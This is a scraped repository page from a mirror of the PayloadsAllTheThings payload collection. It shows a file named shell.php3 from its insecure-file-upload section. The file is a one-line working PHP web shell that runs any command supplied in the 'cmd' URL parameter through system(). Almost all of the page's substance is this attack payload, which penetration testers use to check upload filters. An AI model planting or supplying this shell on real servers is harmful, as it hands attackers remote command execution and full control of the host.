This website requires JavaScript.
Explore
Help
Sign In
ch0ic3
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2025-01-22 19:28:49 +00:00
Code
Issues
Actions
1
Packages
Projects
Releases
Wiki
Activity
2c1d4780bb
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.php3
Swk
2c1d4780bb
Deployed
ddad93a
with MkDocs version: 1.6.1
2025-01-14 21:27:56 +00:00
1 line
43 B
PHP
Raw
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink